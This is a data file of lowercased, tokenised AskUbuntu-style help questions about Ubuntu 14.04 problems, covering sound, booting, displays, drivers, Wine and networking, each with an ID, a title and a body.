517979	systematic way of finding shortcut associations	i am on ubuntu 14.04 with unity and all that . is there a way to systematically lookup for any shortcuts associated with a key combination ? i could scan the system settings gui and compiz setting manager for the binding but it is far from being efficient , plus i never know if i am missing a possible source of bindings . specifically i am looking for any bindings for alt+up and alt+down but i would like to know if there is a general method .
517980	alternative characters key does't work after restarting ubuntu 14.04	after restarting my laptop the alternative characters key does n't work . although it is set as right alt i ca n't enter polish characters such as `` ł , ó , ą , ę , ż , ź , ć , ń '' using it . i always have to go to system settings - > keyboard - > shortcuts - > typing and there i just have to change any one of the shortcuts to something else ( for example 'disabled ' ) for a moment and then set it again to the previous value . this is really unexpected but after this typing works fine , however it drives me mad that i have to do it every time i start my laptop ! the problem may have started when i installed wine and a game 'heroes of might and magic iii ' but i 'm not sure . it may as well have begun when i installed some other programmes for ubuntu such as audio-recorder or lmms . i have tried removing all the recently installed programs including wine but nothing solved the problem . please , help !
517984	stuck in a mess	i 'm stuck in mess . i recently blanked my administrative password . when i try to do anything that requires a password , i do n't have one . also installing software from the networking bash console ( to get something to fix the problem ) in recovery mode is not a option because apt is a mess and i never bothered to install aptitude . changing the password from ubuntu is not an option because it requires a password , and from recovery mode ( using the passwd command ) is does n't detect my user account . is there a iso you can get for changing the password ? help !
517992	mouse cursor is flickering and disappearing	after installing ubuntu 14.04 , my cursor is disappearing on my laptop ( dell inspiron 5110 with nvidia gforce gpu ) . i tried several answers , but the problem is not solved . i tried this : open system settings > displays . in the displays window , you will see an unknown monitor . click it and disable it . and this answer : gsettings set org.gnome.settings-daemon.plugins.cursor active false both solutions did not work . do you have any suggestions ?
517993	pulse audio problems if i start its mixer/controls `pavucontrol`	i have a very strange problem in a fresh installation of ubuntu 14.04 . audio output/input works fine in all programs , but if i open the pulse mixer/controls pavucontrol ( for example , from the sound menu in the desktop panel ) the sound stops working . pavucontrol displays fine and looks like it 's working . but from that moment all programs can not access audio and therefore ( for example firefox on youtube ) they freeze , or ( as vlc ) they do not start at all . additional , if i close and then restart pavucontrol again , it hangs displaying only the text `` establishing connection to pulseaudio . please wait ... '' . also , it 's impossible then to log my user out , it just do not work , it does nothing . i bet there 's something freezed somewhere that the system ca n't manage to stop . so the only way i have to have audio back is to reboot the pc . i tried to run : pulseaudio -- check pulseaudio -d the first runs fine but outputs nothing , and the second says `` can not start deamon '' ( or something like that , it 's localized , i 'm in italy ) . atm i can avoid opening pavucontrol so i have no problems at all . in fact , the main volume slider integrated in the audio popup-menu works fine . but i would like to solve that problem because i sometimes need to adjust the microphone volume , for example . i do not know where to start looking for logs related to audio and pulse , so for now i can not give you more detailed informations .
517995	how do i add login session to gnome session ( gdm ) in trusty 14.04	while lxde display manager seems to list all the window managers i have on its initial splash screen the one for gdm lists only a small number . i would like to add selection desktops which are seen at login . there seems to be a lot of .session files on my system but gdm//gnome splash sees only a few . how can i enable selected others .
517998	multiple user webserver with apache and vsftpd	i am trying to setup a webserver with a multiple user environment . so i have all the websites inside my /var/www directory . but now i 'm facing a problem with my ftp configuration . when a user logs in , i do n't want them to see all of the websites i am hosting . so , for example , i am hosting www.sitea.com , www.siteb.com and www.sitec.com the location of sitea.com would be /var/www/sitea.com/public_html . the location of sitab.com would be /var/www/siteb.com/public_html . the location of sitac.com would be /var/www/sitec.com/public_html . the user for sitea is user1 and the user for siteb and sitec is user2 . so , now i have made the directory /var/www/ root for both users . but i do n't want that user1 sees the directories /siteb.com and /sitec.com . same goes for user2 . i do n't want that user2 sees directory /sitea.com . is there a way to fix that using vsftpd ? i am running apache2 and vsftpd .
517999	lound fan and suspend/hibernate starting for 1-2 seconds before failing	i am a fairly new linux user ... i started with ubuntu 14.04 and it worked well for a while . after a few weeks , pm-suspend and pm-hibernate stopped working . closing the laptop lid would not work , and typing in the command would cause the screen to go dark for 1-2 seconds before resuming . somehow , this fixed itself for a week or two ( i tried to fix it , but pm-utils started working again when i had given up on trying ) but just yesterday , this error came back with the seemingly common fan running on high problem . i spent a while trying solutions found here before giving up and installing 12.04 in hopes that the problem would be solved ( i had assumed that my attempted fixes were sloppy and created more problems ) . now , pm-suspend and pm-hibernate both work , but the fan still runs very loudly and consistently .
518001	dell inspiron 15 3000 and ubuntu 14.04	i have a dell inspiron 15 3000 , it came with ubuntu 12.04 , i wanted to upgrade it to 14.04 , but when i try to boot from usb , after i choose start from the menu ( where there is install , check memory etc ) all i get is a blinking cursor on black background . this is the model with amd hardware .
518002	ntfs drive mount	i have both windows 8.1 and ubuntu 14.04 installed on my system . i was not able to mount my drives in ubuntu but after disabling fast startup in windows it worked perfectly fine . i recently installed cinnamon shell in my ubuntu and after that i 'm not able to mount my windows drive ( c : ) . my d : drive is easily mounted but in case of my c : drive it shows that windows is hibernated and ntfs drive is in unsafe mode . i tried shutting and restarting windows with both fast startup enabled and disabled but its still no use . what can i do to mount my c : dive ?
518004	i tried to install qbasic in ubuntu 14.04	i have tried to install qbasic in ubuntu 14.04 i downloaded qb64 and extracted all files . i then opened a terminal and tried to run setup-lnx.sh . after a lot of activity in the terminal the process ends with [ it appears that the qb64 executable file was not created , this is usually an indication of a compile failure ( you probably saw lots of error messages pop up on the screen ) usually these are due to missing packages needed for compilation . if you 're not running a distro supported by this compiler , please note you will need to install the packages listed above . ] the site from which i obtained qb64 says it will run on most linux distros . i should be grateful for any help peter
518006	screen size has become very small after updates	after running the following command : sudo apt-get install virtualbox-guest-dkms i am getting error as : -- e : unable to lock the administration directory ( var/lib/dpkg ) , are u root ? please help me what shoul i do ? ?
518007	system goes unresponsive when i close the laptop	whenever i close the laptop without locking/logging off , system goes unresponsive . unresponsive in the sense it does n't shows login prompt or not even some error message . however , there is no problem when i lock/log off system before closing the lid of my laptop . i am able to use the laptop only after removing and adding the battery to the slot ( bad habit , still this is the solution i found ) . even the force shutdown - long press of power button is not working . the issue happens irrespective of running applications . one more thing i noticed is that led indicator for hibernate is glowing as if the laptop is hibernating when in unresponsive state . ubuntu version : 14.04 hardware : dell inspiron 3437 please suggest some solution . thanks .
518010	horizon dashboard not run	i 've a question for you , after to deploy all service via juju to realize a cloud infrastructure using openstack , i can not open the horizon dashboard . in juju-gui ( http : //it.tinypic.com/view.php ? pic=szel4n & s=8 # .vahbuwcsxnw ) everything relations are in green status . but if i try to open https : //x.x.x.x/horizon the page is white . thanks for your support .
518011	hp laptop webcam shows upside down	hp compaq 6515b laptop webcam shows upside down in any app that use the webcam . i have tried to use many solution include the command locate v4l but it does n't work .
518014	getting read-only file system after install lubuntu 14.04	sorry for my bad english . i am unable to use ubuntu/lubuntu after a fresh installation . few seconds after boot the system is turned read-only . previous searches indicates a bug with wubi in 14.04 ubuntu version , or a hard drive problem . after change my hd , i get the same error . i already tried : change ro to rw during boot and run 'sudo update-grud ' after boot . run fsck ( in my older and new hd , an it does not found any error ) . i would like to know if there is some type of solution for this situation , because i was using 14.04 ( 32-bit ) with no problem , and now i need to use a 64 bits version .
518017	why access points disappears	why my ubuntu does not show the list of access points ? i wonder why the list vanished after my last -log out on system ? '
518018	how to dual boot moto e with ubuntu touch and android	hi there i am using motorola moto e dual sim version , rooted my mobile having custom recovery twrm android version 4.4.4 kitkat no custom roms are installed , i want to dual boot my mobile android and ubuntu touch please help me guys - thanks in advance
518020	nothing left of my laptop	i have installed ubuntu for the third time . it worked fine the first 2 times . i uninstalled it because of low disk space . this time when i installed ubuntu i disabled fast startup in windows , made ubuntu the default operating system and unchecked the option which specified for how much time the operating system list should be displayed ( system > system protection > select the tab just left to the system protection tab > startup options ) but when i rebooted ubuntu showed error `` serious error has occured while reading the file in / `` below it showed `` press i to ignore , s to skip mounting and m for manual recovery '' i tried all 3 and i did nothing , s and m opened a command prompt and when i typed something it either did not identify or it denied permission . i can not boot into windows because i have disabled the list which showed operating systems and my bios is old so does not support booting from a usb drive and my cd drive is also not working so can not boot from cd . what to do please help i will be thankful
518021	windows does n't show up in grub2 ca n't access bios or boot with cd	i installed ubunto yesterday i had 3 partitions c : / windows d : / other files w : / linux mint when installing ubunto i chose 'replace linux mint' problem : after rebooting windows did n't show up in grub menu . i 've tried grub update but it only detected ubunto ( only 2 partitions ) . i 've tried booting with cd but it goes directly to grub2 . i 've tried accessing bios but it said 'please wait.. ' than directly goes to grub2 . i think i made a mistake , i 've tried to remove ubunto partition with gparted ( i was disperate ) now i ca n't even open ubunto . please help me i do n't want to loose my files .
518022	issues with my file manager - files	while a window of the file manager is opened , on clicking the files icon , in unity , should open the minimised screen . but files application opens another new window . this is reaally annoying as i end up 2 or 3 windows while i was trying to open a minimised window . i checked preferences but i got no clue . i am using ubuntu 14.04 files version : 3.10.1
518025	database with gui	i am trying out a student management module for my project and i need to transfer a lot data from excel sheets to database . could you please suggest me some database and with an interface similar to ms-access ? i have tried mysql -workbench so far . thanks in advance
518029	installing maya 2013 on ubuntu 14.04	hello there peeps of askubuntu ! i 'm new here , and i really need someone to help me install autodesk maya 2013 on my ubuntu 14.04 . i 've tried running a couple scripts , which led me to no avail , and i 'm too much of a newbie to understand the other threads about installing maya . i would appreciate it a whole lot if anyone could give me step-by-step instructions on how to install maya on a fresh version of ubuntu 14.04 . thanks in advance ! computer specs : intel i5 quad core 3.10 ghz nvidia geforce gtx 770 2gb 16gb ram ubuntu 14.04 lts edit : incredibly disappointed in the tagging system here . this is n't a duplicate . the other thread does n't explain enough .
518031	ubuntu 14.04 32/64 bits no usb mouse keyboard no network waiting for network configuration	i am used ubuntu and now i am reinstalled 14.04 64 and no mouse or keyboard or network i am use rescue console from install cd to gather this hw info my network card is qualcomm atheros ar8161 gigabyte cart update : well i am tryed to make new instalation cd and install 14.04 32 bit but same issues during install keyboard and mouse and net works but final install doesnot
518032	i want to do partition on ubuntu ?	i have a 1 tb hardisk which is lmv2 and i want to make two partitions of it . one to normally store stuff . and one ntfs where i can store windows but i get error when i use gpart and this is what it looks like when i try to resize the 930 gb drive , it says it 's busy as ubuntu is using it :
518033	need glibcxx_3.4.15	i have this error when load a plugin on my server : failed ( /usr/lib32/libstdc++.so.6 : version `glibcxx_3.4.15 ' not found ( required by plugins/fcnpc.so ) ) this my libstd : root @ ubuntu : ~/test # strings /usr/lib/libstdc++.so.6 | grep glibc glibcxx_3.4 glibcxx_3.4.1 glibcxx_3.4.2 glibcxx_3.4.3 glibcxx_3.4.4 glibcxx_3.4.5 glibcxx_3.4.6 glibcxx_3.4.7 glibcxx_3.4.8 glibcxx_3.4.9 glibcxx_3.4.10 glibcxx_3.4.11 glibcxx_3.4.12 glibcxx_3.4.13 glibcxx_3.4.14 glibcxx_3.4.15 glibcxx_3.4.16 glibcxx_3.4.17 glibcxx_3.4.18 glibcxx_3.4.19 glibc_2.2.5 glibc_2.3 glibc_2.4 glibc_2.3.2 glibc_2.3.4 glibcxx_debug_message_length i am using ubuntu 10.04 x64 . root @ ubuntu : ~ # uname -a linux ubuntu 2.6.32-38-server # 83-ubuntu smp wed jan 4 11:26:59 utc 2012 x86_64 gnu/linux root @ ubuntu : ~ # apt-get install libstdc++6 reading package lists ... done building dependency tree reading state information ... done libstdc++6 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 3 not upgraded .
518035	installation of meanings failed on nexus 4	i 'm doing a simple test with the tutorial app 'meanings ' . it 's running fine in the emulator but fails if i try to install the 'click ' package on the physical device . executing : /tmp/com.ubuntu.developer.knitzsche.meanings_0.1_all.click launcher pid : 11155 appid : com.ubuntu.developer.knitzsche.meanings_meanings_0.1 architecture : all transaction : installing files status : waiting in queue status : starting status : finished transaction : installing files status : waiting in queue status : waiting for authentication status : waiting in queue status : starting status : finished results : fatal error : /tmp/com.ubuntu.developer.knitzsche.meanings_0.1_all.click failed to install . can not install /tmp/com.ubuntu.developer.knitzsche.meanings_0.1_all.click : signature verification error : debsig : origin signature check failed . this deb might not be signed . installing the application failed seem 's something with the package signing is wrong . the same thing is happen if i run 'click verify ' on the device . any help is appreciated .
518038	why ca n't i get back into ubuntu on my chromebook ?	i installed ubuntu 12.04 lts unity on my acer chromebook and accessed it by doing ctrl-alt-t to get into crosh ( chromebook terminal ) , entering shell , and then sudo startunity . then i tried to install gimp in the software center and it said i could n't because it had to remove files that were essential to my system . then i used the terminal command to install gimp , and it took forever and at the end it did n't work and removed the ubuntu software center and who knows what else . then i shut it down to get back into chrome os , and then tried to get back into it , and the screen went black and then the commands started running across the screen that it does when i get back into chrome , and i went back to chrome instead of ubuntu . how to i get back into ubuntu ? this youtube video shows how i installed it https : //www.youtube.com/watch ? v=dmymqqu2mqs . please help , i have important files in ubuntu and this is probably the biggest crisis of my electronic life .
518039	upgraded from ubuntu 12.04 to 14.04 and sound does n't work . how do i fix it ?	i love ubuntu , i 've been using it for 2.5 years and no trouble so far . i upgraded to trusty tahr and sound just does n't work anymore . sometimes it does , and then suddenly it stops working . for instance , if i 'm playing a video from youtube and i pause it to do something else then it may ( in some cases ) not work ; the computer just goes mute . or if i 'm playing some music in guayadeque or clementine and stop it to watch a video online i hear a sound in my headphones ( like the one you hear when you plug a guitar in a amplifier ) just before the sound goes dead . i 've tried forcing the reload of the alsamix sound driver , reinstalling it but nothing fixes it . none of this happened with my old ubuntu 12.04 . i 'm considering the good idea of downgrading if there 's no fix for it . my computer is a toshiba satellite p105 . 2.5 gb of ram . my sound card is a hda intel . chip : conexant cx20549 ( venice ) and i use some 'advanced linux sound architecture driver version k3.13.0-35-generic ' . anyone , please ! ! tell me how to fix . thanks in advance .
518041	unity does n't work on vnc server under 14.04 lts	after upgrading to ubuntu 14.04 lts , i find the unity destkop in vnc4server never works as it did under ubuntu 12.04 lts . here is my ~/.vnc/xstartup for vnc4server : # ! /bin/sh xrdb $ home/.xresources xsetroot -solid grey /usr/bin/gnome-session & that works fine starting unity desktop on ubuntu 12.04 lts , but unfortunately on 14.04 lts only a gray screen is seen in vncviewer . i searched a little and find this article shows the way to start legacy gnome desktop ( gnome-fallback ) in vnc on 14.04 , but what i want is the solution for a normal unity desktop in vnc . has anyone successfully run unity desktop in a vnc session ( vnc4server , or any other vnc server ) on ubuntu 14.04 lts ?
518043	upgraded from 12.04 to 14.04 and screen brightness can not be decreased	the brightness remains maximum always . i am using acer aspire e1-572 , and its brightness can not be changed . i tried : echo -n 100 > /proc/acpi/video/dvga/lcd/brightness echo -n 100 > /proc/acpi/video/dvga/lcd/brightness and results were : bash : /proc/acpi/video/dvga/lcd/brightness : no such file or directory bash : /proc/acpi/video/vga/lcd/brightness : no such file or directory
518045	duplicate packages error in ubuntu 14.04	when i run sudo apt-get update , the following results occur : reading package lists ... done w : duplicate sources.list entry google'sip/linux/chrome/deb/ stable/main amd64 packages ( /var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_main_binary-amd64_packages ) w : duplicate sources.list entry google'sip/linux/chrome/deb/ stable/main amd64 packages ( /var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_main_binary-amd64_packages ) w : duplicate sources.list entry http : //dl.google.com/linux/chrome/deb/ stable/main i386 packages ( /var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_main_binary-i386_packages ) w : duplicate sources.list entry http : //dl.google.com/linux/chrome/deb/ stable/main i386 packages ( /var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_main_binary-i386_packages ) w : you may want to run apt-get update to correct these problems the solution ubuntu provides is `` run apt-get update to correct these problems '' , but that only produces the duplicate error .
518046	touchpad not working in hp pavilion 14 notebook with ubuntu 14.04	i recently installed ubuntu 14.04 in my laptop and it 's wonderful , but the only problem is my touchpad . it is not as sensitive as it should be and clicking with it instead of using the button only works sometimes . i 'm new to ubuntu , so i would really appreciate any help .
518048	upstart multiple parameters	so im working on a upstart process and wanted to know if i could pass in multiple parameters my-upstart-service restart parm1=foo parm2=bar parm3=hello here is kinda what i had in mind description `` multi parm '' env user=blarg start on startup stop on shutdown respawn instance $ parm1 instance $ parm2 instance $ parm3 env p1= $ { parm1 } env p2= $ { parm2 } env p3= $ { parm3 } script exec sudo -u $ user sh -c `` $ p1/ $ p2/ $ p3.sh '' end script can i do something like this ?
518049	redirect mssql traffic via ubuntu	i 'm trying to redirect a microsoft sql connection from local lan to vpn via ubuntu the ubuntu has connection to both networks i want to be able to connect sql from my pc to the ubuntu and it redirects to the sql server which i on the vpn . i 've tried iptables but not sure if i 'm doing it correct . rav
518050	terminal has lost its transparency option ?	i just installed a new gfx card and ended up reinstalling 14.04 but now i have no option for transparency in the terminal . the whole 'background ' tab is missing in the profile options does anyone know how to fix ? i went from a slightly broken geforce 675 to a 770 . should be no real difference as far as i can see .
518051	slow network and file copy performance	i 'm experiencing a weird problem with my kubuntu installation . i 'm running 14.4 now that was upgraded at least twice using the built-in distribution upgrade . the problems started after the last upgrade to 14.04 : copying files from one place to the other , often different drives , is very slow and often freezes . network transfer to and from other computers is dismal at sub 2 mb/s . that goes for both samba and ftp . the internet works fine and i 'm getting my full download speeds of 400 kb/s . in most cases the file manager and dialog boxes freeze with blank content when i open them , sometimes for a few seconds some times for a few minutes . sometimes the folder tree pane in the file manager freezes but the file/icon pane works . this did n't happen much in the last 48 hours which is coincident with a kernel upgrade ( 3.13.0-35-generic ) . a related issue is gwenview , it opens images fine but freezes for a while when closing it . i benchmarked my network connection and speed from another computer using `` iperf '' and it rated my connection at 91 mb/s so i 'm guessing it 's not a hardware or driver related issue . this problem is with all users on the computer . everything else on the system runs fine like launching apps and so on . any help is greatly appreciated .
518053	how often is the thumbnail cache cleared ?	i 'm not sure which application is the culprit ( nautilus , with the help of another library , i would assume ) , but if you take a look at ~/.cache/thumbnails you will notice that ubuntu stores the thumbnails of images and videos . this cache seems to span pretty far back , and over time it seems to take up more and more space . is there a system in place which automatically clears this cache ? ( perhaps after a certain amount of time , or after external media with the thumbnail has n't been mounted in a while ) . or is the cache expected to grow and grow until the next time you reinstall your system ? or are we forced to manually delete the files in the cache from time to time ?
518054	permanent autostart	i would like to make a python 3.4 script that starts with my computer so that it 's permanently checked to start up with the computer ( edit : permanently checked means it ca n't be disabled via xfce4-session-settings ) . ( edit : this should affect all users , even future ones , but if you answered before i said this , i wo n't factor that in to whether i accept it . ) the script does not need to end , particularly . i do n't want unprivileged users to be able to uncheck it . how would i go about doing this ? currently , they ca n't delete or edit ( or even view the details ) the entry ( thankfully ) , because it 's made for all users ( even future ones ) . however , they can uncheck it just fine , it seems . ( i enabled it for set for all users by adding a myscript.desktop file to /etc/xdg/autostart and gave it the following text : [ desktop entry ] type=application name=nameofmyscript exec=myscript icon=system-run x-gnome-autostart-enabled=true ) the script allows my ip address for a dns-based web filter to be updated . it periodically checks for a lost connection in case the router was reset and the ip address changed . i 'm on xubuntu 14.04 , 64-bit .
518057	how to change currency keyboard mapping	i use a slovenian keyboard layout and that has a dollar $ signs assigned where the number 4 key is also present . as i live in the uk and i use the pound sign a lot i would like to change it so instead of $ it would type âł . i have done this before once on an older ubuntu version but it wo n't work anymore and i ca n't find any good resources for this . my keyboard settings are : xkbmodel= '' pc105 '' xkblayout= '' si '' xkbvariant= '' '' xkboptions= '' ''
518058	how to setup a server for my application for cloud computing ?	requirement : i am the developer of a software which can do enormous number crunching . the number crunching software should be installed on the server . i have a client side application which communicates with the server side application . problem : i went though the ubuntu website and got confused . i understand that i should install ubuntu server on my pc . however i did not understand what is maas , openstack and juju ? do i have to install these as well ? i am trying networking and setting up server for the first time , hence please forgive my ignorance .
518059	use grub2 command line to boot from cd	i ca n't run ubuntu ( it stucks in loading ) . i tried to boot with disc but it goes directly to grub2 menu . i ca n't enter bios it displays 'please wait ' and then goes to grub2 menu either . the only choice i have is to use grub2 command line . i did n't find on google how to do so . please help me with the commands that i have to type .
518060	how to use aldi photo print software ?	i downloaded the photo printing software from aldi : http : //www.aldiphotos.co.uk/photo-books/create-a-photo-book/desktop-software.html i decompressed it and then in a terminal within the folder entered sudo ./install.pl and followed the instructions after which the software was installed in /opt/aldi print software . when i go to that folder in the file manger and double click aldi print software i am told the file is executable and do i want to execute it , execute it in a terminal or cancel . the only option that obviously works is cancel . if i try in a terminal by entering aldi print software or `` aldi print software '' the response is : command not found . so , how do i make this work ? or shall i just go to tesco ?
518062	windows can not shutdown after installing ubuntu	i had installed ubuntu 14.04 on my asus n46 running windows 8.1. after a problem with dual boot both of them and solving it by boot-repair , i have faced a new problem that in windows i can not shut down the laptop , the screen for moment gets black and again its going back on log on window . how can i solve it ?
518064	problem with low screen resolution	i am using two monitors in my desktop . ( 1 ) is connected via dvi and ( 2 ) via vga . max resolution for ( 1 ) is 1600x1200 and for ( 2 ) is 1680x1050 . max resolution for ( 1 ) is recognized as expected but for ( 2 ) i ca n't select anything higher than 1360x768 here is my xrandr -q screen 0 : minimum 8 x 8 , current 2752 x 1200 , maximum 4096 x 4096 dvi-i-0 connected primary 1152x864+0+336 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0 + 1360x768 60.0 59.8 1152x864 60.0* 800x600 72.2 60.3 56.2 680x384 60.0 59.8 640x480 59.9 576x432 60.1 512x384 60.0 400x300 72.2 60.3 56.3 320x240 60.1 vga-0 disconnected ( normal left inverted right x axis y axis ) tv-0 disconnected ( normal left inverted right x axis y axis ) vga-1 connected 1600x1200+1152+0 ( normal left inverted right x axis y axis ) 432mm x 324mm 1600x1200 60.0*+ 1280x1024 75.0 60.0 1280x960 60.0 1152x864 75.0 1024x768 75.0 70.1 60.0 800x600 75.0 72.2 60.3 56.2 640x480 75.0 72.8 59.9 one strange thing also is that although ( 1 ) is connected using dvi in the xrandr above is under vga-1 mode and ( 2 ) is under dvi-i-0 mode although it 's connected using vga cable . so i have two questions : 1 ) how can i set ( 2 ) to use 1680x1050 2 ) should i change anything using xrandr in order to display details under the correct mode ?
518065	troubleshooting winetricks on ubuntu 14.04	whenever i try to run a program in winetricks i get the following message you are using a 64-bit wineprefix . if you encounter problems , please retest in a clean 32-bit wineprefix before reporting a bug . i 'm running a 64 bit version of ubuntu and need some helping navigating through this issue . two months prior i was able to work both programs with relative ease on my computer , but recently this message has been showing up and i can not find a way around it .
518066	how to turn off graphic card	my laptop is over heating . i need to turn off the radeon graphics card and use the built in intel graphics . the lspci output is shown below . lspci | grep vga 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] chelsea lp [ radeon hd 7730m ] supposedly , i can turn off the graphics card using vgaswitcheroo , but in my case vgaswitcheroo does not exist . echo off > /sys/kernel/debug/vgaswitcheroo/switch gives an error stating that no such file or directory exists . i tried mounting , still no vgaswitcheroo was found . sudo mount debugfs none /sys/kernel/debug i searched and found that in some systems vgaswitcheroo is not there . next i tried : sudo aticonfig -- px-igpu to force the integrated graphics to be used , but when i restarted , ubuntu crashed . i needed to do the following to fix the crash . sudo apt-get install -- reinstall libgl1-mesa-glx : i386 libgl1-mesa-glx : amd64 libgl1-mesa-dri : i386 libgl1-mesa-dri : amd64 xserver-xorg-core any help would be greatly appreciated .
518070	problem running ubuntu on chromebook	a couple of days ago i bought a chromebook and decided to run ubuntu on it . after a couple of hours on it , i went back on chrome os . i usually enter sudo startunity in the developpement console to start running ubuntu but this time it displayed . $ sudo startunity entering /mnt/stateful_partition/crouton/chroots/precise ... /usr/bin/xephyr : error while loading shared libraries : libgl.so.1 : can not open shared object file : no such file or directory /usr/bin/xinit : giving up /usr/bin/xinit : unable to connect to x server : no such file or directory /usr/bin/xinit : server error unmounting /mnt/stateful_partition/crouton/chroots/precise ... can anyone tell me how to get back on ubuntu ?
518072	ubuntu 14-04 desktop 386 keeps crashing	i am new to ubuntu and i am looking for some guidance please . the pc i have is acer aspire t135-s870 . the cpu is an amd sempron 64 3000+ fsb 800mhz . ram 1gb ubuntu installed is xubuntu-14-04 desktop 386 previous to ubuntu i had windows xp pro installed . xubuntu-14-04 works ok , but for some reason the pc crashes for no apparent reason , i can be using the wired mouse one minute , then the pc crashes . there is no one thing i can tell you that i am doing at the time the pc crashes because it 's different each time . i am looking for guidance on how to solve this problem . is the version of ubuntu i have installed ok for this pc ? where can i download versions of ubuntu that will work with my system . windows xp pro was removed by the installation of ubuntu when installed . looking forward to your suggestions . john .
518073	how to boot into windows 7 if i only have grub now	my laptop is installed with window 7 , now i want to install ubuntu using its iso image and easybcd , however , i failed in installing ubuntu , and when i boot the laptop i can only see grub interface . now how can i boot into windows7 using grub command ? i tried rootnoverify ( hd0,0 ) chainloader +1 boot however , i can only return to `` install ubuntu '' , i think the reason is that i put the initrd.lz vmlinuz in drive c ( where windows7 is installed ) now i have a ubuntu8 cd . i insert the cd and want to use the trial version to delete `` initrd.lz '' and `` vmlinuz '' in c drive , but i simply ca n't enter /dev/sda and /dev/sda1 . should i install ubuntu 8 and then modify grub under ubuntu 8 so that i can start window7 ?
518075	lightdm is broken when used ubuntu tweak to change the default background !	i have ubuntu 14.04 and i used the `` change login screen background '' and now , when i change my wallpaper , the wallpaper on the login screen dose not change and if i change it via ubuntu tweak , the wallpaper breaks and just shows a purple screen and when i login , some part of the screen changes into statc and other things . how do i fix this ? thank you people for all your support
518076	lenovo touchscreen on c440	i have a lenovo c440 all-in-one pc . i just installed ubuntu on it and have everything setup and working pefectly . the only thing that never worked is the touchscreen . i have ready many different threads and have not found an any solutions . i have upgraded already to the latest possible kernel and nothing . af first , when i touched the screen it seemed to just lost focus of the mouse but the touchscreen still didnt function until i played with the mouse for a bit to get it back . now when i updated to the latest kernel it just seems dead and nothing happenes when i touch the screen . any help or pointers in the right direction would be extremely helpfull ! thanks !
518077	alternatives to openvpn with more free users ?	are there any alternatives to openvpn that will give more than 2 users for free ? i am currently using openvpn access server .
518078	dsl cable not detecting on network settings	i have installed ubuntu 14.04 ( dual boot ) without plugging in my internet cable and when i did plug it in to configure my pppoe connection , it says wired connection unplugged in network settings . i have internet on my windows 7 . i noticed the ethernet modem is not even lighting up in ubuntu . i have done these diagnosis.. p.s : i have no other wireless connection , so i can not use the internet when i 'm in ubuntu . nafees @ nafees-ms-7597 : ~ $ ifconfig eth0 link encap : ethernet hwaddr 6c:62:6d:46:75:00 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:159 errors:0 dropped:0 overruns:0 frame:0 tx packets:159 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:11457 ( 11.4 kb ) tx bytes:11457 ( 11.4 kb ) nafees @ nafees-ms-7597 : ~ $ sudo lshw -c network [ sudo ] password for nafees : *-network disabled description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 06 serial : 6c:62:6d:46:75:00 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8168e-3_0.0.4 03/27/12 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:43 ioport : e800 ( size=256 ) memory : defff000-deffffff memory : deff8000-deffbfff nafees @ nafees-ms-7597 : ~ $ sudo lshw -c network .
518079	no supported adapters , amd catalyst 14.6 beta , ubuntu 14.04	it is probably a bug , but i have not found anything in the internet . i am trying to install amd catalyst 14.6 beta on ubuntu 14.04 and getting the following error `` amd_dcm64 : no supported adapters detected '' . recently i upgraded from 12.10 to 14.04 , but before i have been trying every single version of amd catalyst beta , so the installation process is correct and , yes , i have amd video adapter on my laptop : ) thanks !
518083	curlftpfs moun into ftp dir , not shown on ftpserver	hello people out there , i am trying to mount a ftp into a dir that´s working real fine on local system i am do this with curlftps : curlftpfs -o sslv3 ma3dfaswdtp : ki3f3sfdf34r @ a8.a3.1a7.a:5a4/_g /home/archiv/server/_archiv/_g i can enter archiv and work with it . but when i connect via ftp to the server i don´t see the folder g onle the local folders . local 4 folders , connect via ftp 3 - , - hope you understand my problem regards loip104
518086	wine : messed up window in winecfg , ca n't do anything	i 'm running linux mint 17 with nvidia 331 drivers , my gpu is a gtx 760 . when i start winecfg i get this problem . the first fourth of the window is displayed correctly , i can switch tabs but the bottom part remais the same , blank . once i got the blank part to show the correct information for the applications tab , but when i switched to other tab only the top part had changed , while the bottom remained with the content from the applications tab . i started some applications ( like steamsetup and steam itself ) and the same thing happened . tried installing other wine versions , creating a 32-bit prefix and googled a bit , nothing worked ! any clues ? screenshots of what is happening : thanks !
518089	opera 12 lags on gmail	i 've searched for too long and could n't find anything useful . most of the issues i found are for older versions and are about ipv6 , which i do n't think is the problem here . the problem on arises on certain sites , such as gmail . also , it 's not everywhere on gmail , but only when the list of emails is big . for example , if the inbox has maybe 15 emails in it , opera runs somewhat fine . however once i switch to a different tab like `` promotions '' or `` social '' which has a lot more emails in the list , it lags really badly . the scroll is delayed by one or two seconds . clicking on an email to open it becomes delayed as well . i have a feeling the problem is related to javascript or some setting in opera . any ideas ? running opera 12.16 with ubuntu 14 .
